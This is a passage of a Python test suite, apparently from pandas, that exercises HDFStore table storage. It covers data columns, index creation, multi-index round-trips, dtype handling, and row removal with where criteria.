tm.assert_frame_equal(store['df'], df)
# check that we have indices created
assert(store._handle.root.df.table.cols.index.is_indexed is True)
assert(store._handle.root.df.table.cols.B.is_indexed is True)
# data column searching
result = store.select('df', 'B>0')
expected = df[df.B > 0]
tm.assert_frame_equal(result, expected)
# data column searching (with an indexable and a data_column)
result = store.select(
'df', 'B>0 and index>df.index[3]')
df_new = df.reindex(index=df.index[4:])
expected = df_new[df_new.B > 0]
tm.assert_frame_equal(result, expected)
# data column selection with a string data_column
df_new = df.copy()
df_new['string'] = 'foo'
df_new.loc[1:4, 'string'] = np.nan
df_new.loc[5:6, 'string'] = 'bar'
_maybe_remove(store, 'df')
store.append('df', df_new, data_columns=['string'])
result = store.select('df', "string='foo'")
expected = df_new[df_new.string == 'foo']
tm.assert_frame_equal(result, expected)
# using min_itemsize and a data column
def check_col(key, name, size):
assert getattr(store.get_storer(key)
.table.description, name).itemsize == size
with ensure_clean_store(self.path) as store:
_maybe_remove(store, 'df')
store.append('df', df_new, data_columns=['string'],
min_itemsize={'string': 30})
check_col('df', 'string', 30)
_maybe_remove(store, 'df')
store.append(
'df', df_new, data_columns=['string'], min_itemsize=30)
check_col('df', 'string', 30)
_maybe_remove(store, 'df')
store.append('df', df_new, data_columns=['string'],
min_itemsize={'values': 30})
check_col('df', 'string', 30)
with ensure_clean_store(self.path) as store:
df_new['string2'] = 'foobarbah'
df_new['string_block1'] = 'foobarbah1'
df_new['string_block2'] = 'foobarbah2'
_maybe_remove(store, 'df')
store.append('df', df_new, data_columns=['string', 'string2'],
min_itemsize={'string': 30, 'string2': 40,
'values': 50})
check_col('df', 'string', 30)
check_col('df', 'string2', 40)
check_col('df', 'values_block_1', 50)
with ensure_clean_store(self.path) as store:
# multiple data columns
df_new = df.copy()
df_new.iloc[0, df_new.columns.get_loc('A')] = 1.
df_new.iloc[0, df_new.columns.get_loc('B')] = -1.
df_new['string'] = 'foo'
sl = df_new.columns.get_loc('string')
df_new.iloc[1:4, sl] = np.nan
df_new.iloc[5:6, sl] = 'bar'
df_new['string2'] = 'foo'
sl = df_new.columns.get_loc('string2')
df_new.iloc[2:5, sl] = np.nan
df_new.iloc[7:8, sl] = 'bar'
_maybe_remove(store, 'df')
store.append(
'df', df_new, data_columns=['A', 'B', 'string', 'string2'])
result = store.select('df',
"string='foo' and string2='foo'"
" and A>0 and B<0")
expected = df_new[(df_new.string == 'foo') & (
df_new.string2 == 'foo') & (df_new.A > 0) & (df_new.B < 0)]
tm.assert_frame_equal(result, expected, check_index_type=False)
# yield an empty frame
result = store.select('df', "string='foo' and string2='cool'")
expected = df_new[(df_new.string == 'foo') & (
df_new.string2 == 'cool')]
tm.assert_frame_equal(result, expected, check_index_type=False)
with ensure_clean_store(self.path) as store:
# doc example
df_dc = df.copy()
df_dc['string'] = 'foo'
df_dc.loc[4:6, 'string'] = np.nan
df_dc.loc[7:9, 'string'] = 'bar'
df_dc['string2'] = 'cool'
df_dc['datetime'] = Timestamp('20010102')
df_dc = df_dc._convert(datetime=True)
df_dc.loc[3:5, ['A', 'B', 'datetime']] = np.nan
_maybe_remove(store, 'df_dc')
store.append('df_dc', df_dc,
data_columns=['B', 'C', 'string',
'string2', 'datetime'])
result = store.select('df_dc', 'B>0')
expected = df_dc[df_dc.B > 0]
tm.assert_frame_equal(result, expected, check_index_type=False)
result = store.select(
'df_dc', ['B > 0', 'C > 0', 'string == foo'])
expected = df_dc[(df_dc.B > 0) & (df_dc.C > 0) & (
df_dc.string == 'foo')]
tm.assert_frame_equal(result, expected, check_index_type=False)
with ensure_clean_store(self.path) as store:
# doc example part 2
np.random.seed(1234)
index = date_range('1/1/2000', periods=8)
df_dc = DataFrame(np.random.randn(8, 3), index=index,
columns=['A', 'B', 'C'])
df_dc['string'] = 'foo'
df_dc.loc[4:6, 'string'] = np.nan
df_dc.loc[7:9, 'string'] = 'bar'
df_dc.loc[:, ['B', 'C']] = df_dc.loc[:, ['B', 'C']].abs()
df_dc['string2'] = 'cool'
# on-disk operations
store.append('df_dc', df_dc, data_columns=[
'B', 'C', 'string', 'string2'])
result = store.select('df_dc', 'B>0')
expected = df_dc[df_dc.B > 0]
tm.assert_frame_equal(result, expected)
result = store.select(
'df_dc', ['B > 0', 'C > 0', 'string == "foo"'])
expected = df_dc[(df_dc.B > 0) & (df_dc.C > 0) &
(df_dc.string == 'foo')]
tm.assert_frame_equal(result, expected)
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
# panel
# GH5717 not handling data_columns
np.random.seed(1234)
p = tm.makePanel()
store.append('p1', p)
tm.assert_panel_equal(store.select('p1'), p)
store.append('p2', p, data_columns=True)
tm.assert_panel_equal(store.select('p2'), p)
result = store.select('p2', where='ItemA>0')
expected = p.to_frame()
expected = expected[expected['ItemA'] > 0]
tm.assert_frame_equal(result.to_frame(), expected)
result = store.select(
'p2', where='ItemA>0 & minor_axis=["A","B"]')
expected = p.to_frame()
expected = expected[expected['ItemA'] > 0]
expected = expected[expected.reset_index(
level=['major']).index.isin(['A', 'B'])]
tm.assert_frame_equal(result.to_frame(), expected)
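# Note on indexing: by default append() creates a PyTables index on the
# indexables and data columns; create_table_index() can (re)build them with
# explicit optlevel (0-9) and kind ('light', 'medium', 'full'), which are
# passed straight through to PyTables.  Minimal sketch (illustrative key):
#   store.create_table_index('df_demo', columns=['B'], optlevel=9, kind='full')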
def test_create_table_index(self):
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
def col(t, column):
return getattr(store.get_storer(t).table.cols, column)
# index=False
wp = tm.makePanel()
store.append('p5', wp, index=False)
store.create_table_index('p5', columns=['major_axis'])
assert(col('p5', 'major_axis').is_indexed is True)
assert(col('p5', 'minor_axis').is_indexed is False)
# index=True
store.append('p5i', wp, index=True)
assert(col('p5i', 'major_axis').is_indexed is True)
assert(col('p5i', 'minor_axis').is_indexed is True)
# default optlevels
store.get_storer('p5').create_index()
assert(col('p5', 'major_axis').index.optlevel == 6)
assert(col('p5', 'minor_axis').index.kind == 'medium')
# let's change the indexing scheme
store.create_table_index('p5')
assert(col('p5', 'major_axis').index.optlevel == 6)
assert(col('p5', 'minor_axis').index.kind == 'medium')
store.create_table_index('p5', optlevel=9)
assert(col('p5', 'major_axis').index.optlevel == 9)
assert(col('p5', 'minor_axis').index.kind == 'medium')
store.create_table_index('p5', kind='full')
assert(col('p5', 'major_axis').index.optlevel == 9)
assert(col('p5', 'minor_axis').index.kind == 'full')
store.create_table_index('p5', optlevel=1, kind='light')
assert(col('p5', 'major_axis').index.optlevel == 1)
assert(col('p5', 'minor_axis').index.kind == 'light')
# data columns
df = tm.makeTimeDataFrame()
df['string'] = 'foo'
df['string2'] = 'bar'
store.append('f', df, data_columns=['string', 'string2'])
assert(col('f', 'index').is_indexed is True)
assert(col('f', 'string').is_indexed is True)
assert(col('f', 'string2').is_indexed is True)
# specify index=columns
store.append(
'f2', df, index=['string'],
data_columns=['string', 'string2'])
assert(col('f2', 'index').is_indexed is False)
assert(col('f2', 'string').is_indexed is True)
assert(col('f2', 'string2').is_indexed is False)
# try to index a non-table
_maybe_remove(store, 'f2')
store.put('f2', df)
pytest.raises(TypeError, store.create_table_index, 'f2')
def test_append_diff_item_order(self):
with catch_warnings(record=True):
wp = tm.makePanel()
wp1 = wp.iloc[:, :10, :]
wp2 = wp.iloc[wp.items.get_indexer(['ItemC', 'ItemB', 'ItemA']),
10:, :]
with ensure_clean_store(self.path) as store:
store.put('panel', wp1, format='table')
pytest.raises(ValueError, store.put, 'panel', wp2,
append=True)
def test_append_hierarchical(self):
index = MultiIndex(levels=[['foo', 'bar', 'baz', 'qux'],
['one', 'two', 'three']],
labels=[[0, 0, 0, 1, 1, 2, 2, 3, 3, 3],
[0, 1, 2, 0, 1, 1, 2, 0, 1, 2]],
names=['foo', 'bar'])
df = DataFrame(np.random.randn(10, 3), index=index,
columns=['A', 'B', 'C'])
with ensure_clean_store(self.path) as store:
store.append('mi', df)
result = store.select('mi')
tm.assert_frame_equal(result, df)
# GH 3748
result = store.select('mi', columns=['A', 'B'])
expected = df.reindex(columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
with ensure_clean_path('test.hdf') as path:
df.to_hdf(path, 'df', format='table')
result = read_hdf(path, 'df', columns=['A', 'B'])
expected = df.reindex(columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_column_multiindex(self):
# GH 4710
# recreate multi-indexes properly
index = MultiIndex.from_tuples([('A', 'a'), ('A', 'b'),
('B', 'a'), ('B', 'b')],
names=['first', 'second'])
df = DataFrame(np.arange(12).reshape(3, 4), columns=index)
expected = df.copy()
if isinstance(expected.index, RangeIndex):
expected.index = Int64Index(expected.index)
with ensure_clean_store(self.path) as store:
store.put('df', df)
tm.assert_frame_equal(store['df'], expected,
check_index_type=True,
check_column_type=True)
store.put('df1', df, format='table')
tm.assert_frame_equal(store['df1'], expected,
check_index_type=True,
check_column_type=True)
pytest.raises(ValueError, store.put, 'df2', df,
format='table', data_columns=['A'])
pytest.raises(ValueError, store.put, 'df3', df,
format='table', data_columns=True)
# appending multi-column on existing table (see GH 6167)
with ensure_clean_store(self.path) as store:
store.append('df2', df)
store.append('df2', df)
tm.assert_frame_equal(store['df2'], concat((df, df)))
# non_index_axes name
df = DataFrame(np.arange(12).reshape(3, 4),
columns=Index(list('ABCD'), name='foo'))
expected = df.copy()
if isinstance(expected.index, RangeIndex):
expected.index = Int64Index(expected.index)
with ensure_clean_store(self.path) as store:
store.put('df1', df, format='table')
tm.assert_frame_equal(store['df1'], expected,
check_index_type=True,
check_column_type=True)
def test_store_multiindex(self):
# validate multi-index names
# GH 5527
with ensure_clean_store(self.path) as store:
def make_index(names=None):
return MultiIndex.from_tuples([(datetime.datetime(2013, 12, d),
s, t)
for d in range(1, 3)
for s in range(2)
for t in range(3)],
names=names)
# no names
_maybe_remove(store, 'df')
df = DataFrame(np.zeros((12, 2)), columns=[
'a', 'b'], index=make_index())
store.append('df', df)
tm.assert_frame_equal(store.select('df'), df)
# partial names
_maybe_remove(store, 'df')
df = DataFrame(np.zeros((12, 2)), columns=[
'a', 'b'], index=make_index(['date', None, None]))
store.append('df', df)
tm.assert_frame_equal(store.select('df'), df)
# series
_maybe_remove(store, 's')
s = Series(np.zeros(12), index=make_index(['date', None, None]))
store.append('s', s)
xp = Series(np.zeros(12), index=make_index(
['date', 'level_1', 'level_2']))
tm.assert_series_equal(store.select('s'), xp)
# dup with column
_maybe_remove(store, 'df')
df = DataFrame(np.zeros((12, 2)), columns=[
'a', 'b'], index=make_index(['date', 'a', 't']))
pytest.raises(ValueError, store.append, 'df', df)
# fully named
_maybe_remove(store, 'df')
df = DataFrame(np.zeros((12, 2)), columns=[
'a', 'b'], index=make_index(['date', 's', 't']))
store.append('df', df)
tm.assert_frame_equal(store.select('df'), df)
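# When a MultiIndexed object is stored in table format each level becomes its
# own indexable column; unnamed levels get generated names ('level_1',
# 'level_2', ...), which is why the Series round-trip above compares against
# an index renamed to ['date', 'level_1', 'level_2'].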
def test_select_columns_in_where(self):
# GH 6169
# recreate multi-indexes when columns is passed
# in the `where` argument
index = MultiIndex(levels=[['foo', 'bar', 'baz', 'qux'],
['one', 'two', 'three']],
labels=[[0, 0, 0, 1, 1, 2, 2, 3, 3, 3],
[0, 1, 2, 0, 1, 1, 2, 0, 1, 2]],
names=['foo_name', 'bar_name'])
# With a DataFrame
df = DataFrame(np.random.randn(10, 3), index=index,
columns=['A', 'B', 'C'])
with ensure_clean_store(self.path) as store:
store.put('df', df, format='table')
expected = df[['A']]
tm.assert_frame_equal(store.select('df', columns=['A']), expected)
tm.assert_frame_equal(store.select(
'df', where="columns=['A']"), expected)
# With a Series
s = Series(np.random.randn(10), index=index,
name='A')
with ensure_clean_store(self.path) as store:
store.put('s', s, format='table')
tm.assert_series_equal(store.select('s', where="columns=['A']"), s)
def test_mi_data_columns(self):
# GH 14435
idx = pd.MultiIndex.from_arrays([date_range('2000-01-01', periods=5),
range(5)], names=['date', 'id'])
df = pd.DataFrame({'a': [1.1, 1.2, 1.3, 1.4, 1.5]}, index=idx)
with ensure_clean_store(self.path) as store:
store.append('df', df, data_columns=True)
actual = store.select('df', where='id == 1')
expected = df.iloc[[1], :]
tm.assert_frame_equal(actual, expected)
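# With data_columns=True the MultiIndex levels ('date' and 'id') are also
# written as queryable columns, which is what makes the 'id == 1' selection
# above possible (GH 14435).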
def test_pass_spec_to_storer(self):
df = tm.makeDataFrame()
with ensure_clean_store(self.path) as store:
store.put('df', df)
pytest.raises(TypeError, store.select, 'df', columns=['A'])
pytest.raises(TypeError, store.select,
'df', where=[('columns=A')])
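# put() defaults to the 'fixed' format, which only supports retrieving the
# whole object; column selection and where-filtering need format='table'
# (or append), hence the TypeErrors above.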
def test_append_misc(self):
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
# unsupported data types for non-tables
p4d = tm.makePanel4D()
pytest.raises(TypeError, store.put, 'p4d', p4d)
# unsupported data types
pytest.raises(TypeError, store.put, 'abc', None)
pytest.raises(TypeError, store.put, 'abc', '123')
pytest.raises(TypeError, store.put, 'abc', 123)
pytest.raises(TypeError, store.put, 'abc', np.arange(5))
df = tm.makeDataFrame()
store.append('df', df, chunksize=1)
result = store.select('df')
tm.assert_frame_equal(result, df)
store.append('df1', df, expectedrows=10)
result = store.select('df1')
tm.assert_frame_equal(result, df)
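# chunksize only controls how many rows are written per batch, and
# expectedrows is merely a PyTables sizing hint; neither changes the stored
# result, which is why both round-trips above compare equal.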
# more chunksize in append tests
def check(obj, comparator):
for c in [10, 200, 1000]:
with ensure_clean_store(self.path, mode='w') as store:
store.append('obj', obj, chunksize=c)
result = store.select('obj')
comparator(result, obj)
df = tm.makeDataFrame()
df['string'] = 'foo'
df['float322'] = 1.
df['float322'] = df['float322'].astype('float32')
df['bool'] = df['float322'] > 0
df['time1'] = Timestamp('20130101')
df['time2'] = Timestamp('20130102')
check(df, tm.assert_frame_equal)
with catch_warnings(record=True):
p = tm.makePanel()
check(p, assert_panel_equal)
with catch_warnings(record=True):
p4d = tm.makePanel4D()
check(p4d, assert_panel4d_equal)
# empty frame, GH4273
with ensure_clean_store(self.path) as store:
# 0 len
df_empty = DataFrame(columns=list('ABC'))
store.append('df', df_empty)
pytest.raises(KeyError, store.select, 'df')
# repeated append of 0/non-zero frames
df = DataFrame(np.random.rand(10, 3), columns=list('ABC'))
store.append('df', df)
assert_frame_equal(store.select('df'), df)
store.append('df', df_empty)
assert_frame_equal(store.select('df'), df)
# store
df = DataFrame(columns=list('ABC'))
store.put('df2', df)
assert_frame_equal(store.select('df2'), df)
with catch_warnings(record=True):
# 0 len
p_empty = Panel(items=list('ABC'))
store.append('p', p_empty)
pytest.raises(KeyError, store.select, 'p')
# repeated append of 0/non-zero frames
p = Panel(np.random.randn(3, 4, 5), items=list('ABC'))
store.append('p', p)
assert_panel_equal(store.select('p'), p)
store.append('p', p_empty)
assert_panel_equal(store.select('p'), p)
# store
store.put('p2', p_empty)
assert_panel_equal(store.select('p2'), p_empty)
def test_append_raise(self):
with ensure_clean_store(self.path) as store:
# test append with invalid input to get good error messages
# list in column
df = tm.makeDataFrame()
df['invalid'] = [['a']] * len(df)
assert df.dtypes['invalid'] == np.object_
pytest.raises(TypeError, store.append, 'df', df)
# multiple invalid columns
df['invalid2'] = [['a']] * len(df)
df['invalid3'] = [['a']] * len(df)
pytest.raises(TypeError, store.append, 'df', df)
# datetime with embedded nans as object
df = tm.makeDataFrame()
s = Series(datetime.datetime(2001, 1, 2), index=df.index)
s = s.astype(object)
s[0:5] = np.nan
df['invalid'] = s
assert df.dtypes['invalid'] == np.object_
pytest.raises(TypeError, store.append, 'df', df)
# directly ndarray
pytest.raises(TypeError, store.append, 'df', np.arange(10))
# series directly
pytest.raises(TypeError, store.append,
'df', Series(np.arange(10)))
# appending an incompatible table
df = tm.makeDataFrame()
store.append('df', df)
df['foo'] = 'foo'
pytest.raises(ValueError, store.append, 'df', df)
def test_table_index_incompatible_dtypes(self):
df1 = DataFrame({'a': [1, 2, 3]})
df2 = DataFrame({'a': [4, 5, 6]},
index=date_range('1/1/2000', periods=3))
with ensure_clean_store(self.path) as store:
store.put('frame', df1, format='table')
pytest.raises(TypeError, store.put, 'frame', df2,
format='table', append=True)
def test_table_values_dtypes_roundtrip(self):
with ensure_clean_store(self.path) as store:
df1 = DataFrame({'a': [1, 2, 3]}, dtype='f8')
store.append('df_f8', df1)
assert_series_equal(df1.dtypes, store['df_f8'].dtypes)
df2 = DataFrame({'a': [1, 2, 3]}, dtype='i8')
store.append('df_i8', df2)
assert_series_equal(df2.dtypes, store['df_i8'].dtypes)
# incompatible dtype
pytest.raises(ValueError, store.append, 'df_i8', df1)
# check creation/storage/retrieval of float32 (a bit hacky to
# actually create them though)
df1 = DataFrame(
np.array([[1], [2], [3]], dtype='f4'), columns=['A'])
store.append('df_f4', df1)
assert_series_equal(df1.dtypes, store['df_f4'].dtypes)
assert df1.dtypes[0] == 'float32'
# check with mixed dtypes
df1 = DataFrame(dict((c, Series(np.random.randn(5), dtype=c))
for c in ['float32', 'float64', 'int32',
'int64', 'int16', 'int8']))
df1['string'] = 'foo'
df1['float322'] = 1.
df1['float322'] = df1['float322'].astype('float32')
df1['bool'] = df1['float32'] > 0
df1['time1'] = Timestamp('20130101')
df1['time2'] = Timestamp('20130102')
store.append('df_mixed_dtypes1', df1)
result = store.select('df_mixed_dtypes1').get_dtype_counts()
expected = Series({'float32': 2, 'float64': 1, 'int32': 1,
'bool': 1, 'int16': 1, 'int8': 1,
'int64': 1, 'object': 1, 'datetime64[ns]': 2})
result = result.sort_index()
expected = expected.sort_index()
tm.assert_series_equal(result, expected)
def test_table_mixed_dtypes(self):
# frame
df = tm.makeDataFrame()
df['obj1'] = 'foo'
df['obj2'] = 'bar'
df['bool1'] = df['A'] > 0
df['bool2'] = df['B'] > 0
df['bool3'] = True
df['int1'] = 1
df['int2'] = 2
df['timestamp1'] = Timestamp('20010102')
df['timestamp2'] = Timestamp('20010103')
df['datetime1'] = datetime.datetime(2001, 1, 2, 0, 0)
df['datetime2'] = datetime.datetime(2001, 1, 3, 0, 0)
df.loc[3:6, ['obj1']] = np.nan
df = df._consolidate()._convert(datetime=True)
with ensure_clean_store(self.path) as store:
store.append('df1_mixed', df)
tm.assert_frame_equal(store.select('df1_mixed'), df)
with catch_warnings(record=True):
# panel
wp = tm.makePanel()
wp['obj1'] = 'foo'
wp['obj2'] = 'bar'
wp['bool1'] = wp['ItemA'] > 0
wp['bool2'] = wp['ItemB'] > 0
wp['int1'] = 1
wp['int2'] = 2
wp = wp._consolidate()
with catch_warnings(record=True):
with ensure_clean_store(self.path) as store:
store.append('p1_mixed', wp)
assert_panel_equal(store.select('p1_mixed'), wp)
with catch_warnings(record=True):
# ndim
wp = tm.makePanel4D()
wp['obj1'] = 'foo'
wp['obj2'] = 'bar'
wp['bool1'] = wp['l1'] > 0
wp['bool2'] = wp['l2'] > 0
wp['int1'] = 1
wp['int2'] = 2
wp = wp._consolidate()
with ensure_clean_store(self.path) as store:
store.append('p4d_mixed', wp)
assert_panel4d_equal(store.select('p4d_mixed'), wp)
def test_unimplemented_dtypes_table_columns(self):
with ensure_clean_store(self.path) as store:
l = [('date', datetime.date(2001, 1, 2))]
# py3 ok for unicode
if not compat.PY3:
l.append(('unicode', u('\\u03c3')))
# currently not supported dtypes ####
for n, f in l:
df = tm.makeDataFrame()
df[n] = f
pytest.raises(
TypeError, store.append, 'df1_%s' % n, df)
# frame
df = tm.makeDataFrame()
df['obj1'] = 'foo'
df['obj2'] = 'bar'
df['datetime1'] = datetime.date(2001, 1, 2)
df = df._consolidate()._convert(datetime=True)
with ensure_clean_store(self.path) as store:
# this fails because we have a date in the object block
pytest.raises(TypeError, store.append, 'df_unimplemented', df)
def test_calendar_roundtrip_issue(self):
# 8591
# doc example from tseries holiday section
weekmask_egypt = 'Sun Mon Tue Wed Thu'
holidays = ['2012-05-01',
datetime.datetime(2013, 5, 1), np.datetime64('2014-05-01')]
bday_egypt = pd.offsets.CustomBusinessDay(
holidays=holidays, weekmask=weekmask_egypt)
dt = datetime.datetime(2013, 4, 30)
dts = date_range(dt, periods=5, freq=bday_egypt)
s = (Series(dts.weekday, dts).map(
Series('Mon Tue Wed Thu Fri Sat Sun'.split())))
with ensure_clean_store(self.path) as store:
store.put('fixed', s)
result = store.select('fixed')
assert_series_equal(result, s)
store.append('table', s)
result = store.select('table')
assert_series_equal(result, s)
def test_roundtrip_tz_aware_index(self):
# GH 17618
time = pd.Timestamp('2000-01-01 01:00:00', tz='US/Eastern')
df = pd.DataFrame(data=[0], index=[time])
with ensure_clean_store(self.path) as store:
store.put('frame', df, format='fixed')
recons = store['frame']
tm.assert_frame_equal(recons, df)
assert recons.index[0].value == 946706400000000000
def test_append_with_timedelta(self):
# GH 3577
# append timedelta
df = DataFrame(dict(A=Timestamp('20130101'), B=[Timestamp(
'20130101') + timedelta(days=i, seconds=10) for i in range(10)]))
df['C'] = df['A'] - df['B']
df.loc[3:5, 'C'] = np.nan
with ensure_clean_store(self.path) as store:
# table
_maybe_remove(store, 'df')
store.append('df', df, data_columns=True)
result = store.select('df')
assert_frame_equal(result, df)
result = store.select('df', where="C<100000")
assert_frame_equal(result, df)
result = store.select('df', where="C<pd.Timedelta('-3D')")
assert_frame_equal(result, df.iloc[3:])
result = store.select('df', "C<'-3D'")
assert_frame_equal(result, df.iloc[3:])
# a bit hacky here as we don't really deal with the NaT properly
result = store.select('df', "C<'-500000s'")
result = result.dropna(subset=['C'])
assert_frame_equal(result, df.iloc[6:])
result = store.select('df', "C<'-3.5D'")
result = result.iloc[1:]
assert_frame_equal(result, df.iloc[4:])
# fixed
_maybe_remove(store, 'df2')
store.put('df2', df)
result = store.select('df2')
assert_frame_equal(result, df)
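# timedelta64 data columns can be filtered with a pd.Timedelta or with a
# timedelta string such as '-3D', as exercised above; in fixed format the
# frame can only be read back whole.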
def test_remove(self):
with ensure_clean_store(self.path) as store:
ts = tm.makeTimeSeries()
df = tm.makeDataFrame()
store['a'] = ts
store['b'] = df
_maybe_remove(store, 'a')
assert len(store) == 1
tm.assert_frame_equal(df, store['b'])
_maybe_remove(store, 'b')
assert len(store) == 0
# nonexistence
pytest.raises(KeyError, store.remove, 'a_nonexistent_store')
# pathing
store['a'] = ts
store['b/foo'] = df
_maybe_remove(store, 'foo')
_maybe_remove(store, 'b/foo')
assert len(store) == 1
store['a'] = ts
store['b/foo'] = df
_maybe_remove(store, 'b')
assert len(store) == 1
# __delitem__
store['a'] = ts
store['b'] = df
del store['a']
del store['b']
assert len(store) == 0
def test_remove_where(self):
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
# non-existent key
crit1 = 'index>foo'
pytest.raises(KeyError, store.remove, 'a', [crit1])
# try to remove non-table (with crit)
# non-table ok (where = None)
wp = tm.makePanel(30)
store.put('wp', wp, format='table')
store.remove('wp', ["minor_axis=['A', 'D']"])
rs = store.select('wp')
expected = wp.reindex(minor_axis=['B', 'C'])
assert_panel_equal(rs, expected)
# empty where
_maybe_remove(store, 'wp')
store.put('wp', wp, format='table')
# deleted number (entire table)
n = store.remove('wp', [])
assert n == 120
# non - empty where
_maybe_remove(store, 'wp')
store.put('wp', wp, format='table')
pytest.raises(ValueError, store.remove,
'wp', ['foo'])
def test_remove_startstop(self):
# GH #4835 and #6177
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
wp = tm.makePanel(30)
# start
_maybe_remove(store, 'wp1')
store.put('wp1', wp, format='t')
n = store.remove('wp1', start=32)
assert n == 120 - 32
result = store.select('wp1')
expected = wp.reindex(major_axis=wp.major_axis[:32 // 4])
assert_panel_equal(result, expected)
_maybe_remove(store, 'wp2')
store.put('wp2', wp, format='t')
n = store.remove('wp2', start=-32)
assert n == 32
result = store.select('wp2')
expected = wp.reindex(major_axis=wp.major_axis[:-32 // 4])
assert_panel_equal(result, expected)
# stop
_maybe_remove(store, 'wp3')
store.put('wp3', wp, format='t')
n = store.remove('wp3', stop=32)
assert n == 32
result = store.select('wp3')
expected = wp.reindex(major_axis=wp.major_axis[32 // 4:])
assert_panel_equal(result, expected)
_maybe_remove(store, 'wp4')
store.put('wp4', wp, format='t')
n = store.remove('wp4', stop=-32)
assert n == 120 - 32
result = store.select('wp4')
expected = wp.reindex(major_axis=wp.major_axis[-32 // 4:])
assert_panel_equal(result, expected)
# start and stop
_maybe_remove(store, 'wp5')
store.put('wp5', wp, format='t')
n = store.remove('wp5', start=16, stop=-16)
assert n == 120 - 32
result = store.select('wp5')
expected = wp.reindex(
major_axis=(wp.major_axis[:16 // 4]
.union(wp.major_axis[-16 // 4:])))
assert_panel_equal(result, expected)
_maybe_remove(store, 'wp6')
store.put('wp6', wp, format='t')
n = store.remove('wp6', start=16, stop=16)
assert n == 0
result = store.select('wp6')
expected = wp.reindex(major_axis=wp.major_axis)
assert_panel_equal(result, expected)
# with where
_maybe_remove(store, 'wp7')
# TODO: unused?
date = wp.major_axis.take(np.arange(0, 30, 3)) # noqa
crit = 'major_axis=date'
store.put('wp7', wp, format='t')
n = store.remove('wp7', where=[crit], stop=80)
assert n == 28
result = store.select('wp7')
expected = wp.reindex(major_axis=wp.major_axis.difference(
wp.major_axis[np.arange(0, 20, 3)]))
assert_panel_equal(result, expected)
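# start/stop passed to remove() address raw table rows (for this panel,
# 30 major x 4 minor = 120 rows); negative values count from the end, like
# Python slicing, and the return value is the number of rows removed.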
def test_remove_crit(self):
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
wp = tm.makePanel(30)
# group row removal
_maybe_remove(store, 'wp3')
date4 = wp.major_axis.take([0, 1, 2, 4, 5, 6, 8, 9, 10])
crit4 = 'major_axis=date4'
store.put('wp3', wp, format='t')
n = store.remove('wp3', where=[crit4])
assert n == 36
result = store.select('wp3')
expected = wp.reindex(
major_axis=wp.major_axis.difference(date4))
assert_panel_equal(result, expected)
# upper half
_maybe_remove(store, 'wp')
store.put('wp', wp, format='table')
date = wp.major_axis[len(wp.major_axis) // 2]
crit1 = 'major_axis>date'
crit2 = "minor_axis=['A', 'D']"
n = store.remove('wp', where=[crit1])
assert n == 56
n = store.remove('wp', where=[crit2])
assert n == 32
result = store['wp']
expected = wp.truncate(after=date).reindex(minor=['B', 'C'])
assert_panel_equal(result, expected)
# individual row elements
_maybe_remove(store, 'wp2')
store.put('wp2', wp, format='table')
date1 = wp.major_axis[1:3]
crit1 = 'major_axis=date1'
store.remove('wp2', where=[crit1])
result = store.select('wp2')
expected = wp.reindex(
major_axis=wp.major_axis.difference(date1))
assert_panel_equal(result, expected)
date2 = wp.major_axis[5]
crit2 = 'major_axis=date2'
store.remove('wp2', where=[crit2])
result = store['wp2']
expected = wp.reindex(
major_axis=(wp.major_axis
.difference(date1)
.difference(Index([date2]))
))
assert_panel_equal(result, expected)
date3 = [wp.major_axis[7], wp.major_axis[9]]
crit3 = 'major_axis=date3'
store.remove('wp2', where=[crit3])
result = store['wp2']
expected = wp.reindex(major_axis=wp.major_axis
.difference(date1)
.difference(Index([date2]))
.difference(Index(date3)))
assert_panel_equal(result, expected)
# corners
_maybe_remove(store, 'wp4')
store.put('wp4', wp, format='table')
n = store.remove(
'wp4', where="major_axis>wp.major_axis[-1]")
result = store.select('wp4')
assert_panel_equal(result, wp)
def test_invalid_terms(self):
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
df = tm.makeTimeDataFrame()
df['string'] = 'foo'
df.loc[0:4, 'string'] = 'bar'
wp = tm.makePanel()
p4d = tm.makePanel4D()
store.put('df', df, format='table')
store.put('wp', wp, format='table')
store.put('p4d', p4d, format='table')
# some invalid terms
pytest.raises(ValueError, store.select,
'wp', "minor=['A', 'B']")
pytest.raises(ValueError, store.select,
'wp', ["index=['20121114']"])
pytest.raises(ValueError, store.select, 'wp', [
"index=['20121114', '20121114']"])
pytest.raises(TypeError, Term)
# more invalid
pytest.raises(
ValueError, store.select, 'df', 'df.index[3]')
pytest.raises(SyntaxError, store.select, 'df', 'index>')
pytest.raises(
ValueError, store.select, 'wp',
"major_axis<'20000108' & minor_axis['A', 'B']")
# from the docs
with ensure_clean_path(self.path) as path:
dfq = DataFrame(np.random.randn(10, 4), columns=list(
'ABCD'), index=date_range('20130101', periods=10))
dfq.to_hdf(path, 'dfq', format='table', data_columns=True)
# check ok
read_hdf(path, 'dfq',
where="index>Timestamp('20130104') & columns=['A', 'B']")
read_hdf(path, 'dfq', where="A>0 or C>0")
# catch the invalid reference
with ensure_clean_path(self.path) as path:
dfq = DataFrame(np.random.randn(10, 4), columns=list(
'ABCD'), index=date_range('20130101', periods=10))
dfq.to_hdf(path, 'dfq', format='table')
pytest.raises(ValueError, read_hdf, path,
'dfq', where="A>0 or C>0")
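# A where expression may only reference the indexables and data_columns of
# the table; 'dfq' above was written without data_columns, so filtering on
# 'A' or 'C' raises ValueError.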
def test_terms(self):
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
wp = tm.makePanel()
wpneg = Panel.fromDict({-1: tm.makeDataFrame(),
0: tm.makeDataFrame(),
1: tm.makeDataFrame()})
p4d = tm.makePanel4D()
store.put('p4d', p4d, format='table')
store.put('wp', wp, format='table')
store.put('wpneg', wpneg, format='table')
# panel
result = store.select(
'wp',
"major_axis<'20000108' and minor_axis=['A', 'B']")
expected = wp.truncate(
after='20000108').reindex(minor=['A', 'B'])
assert_panel_equal(result, expected)
# the same selection, passing the expression via the where= keyword
result = store.select(
'wp', where=("major_axis<'20000108' "
"and minor_axis=['A', 'B']"))
expected = wp.truncate(
after='20000108').reindex(minor=['A', 'B'])
tm.assert_panel_equal(result, expected)
# p4d
with catch_warnings(record=True):
result = store.select('p4d',
("major_axis<'20000108' and "
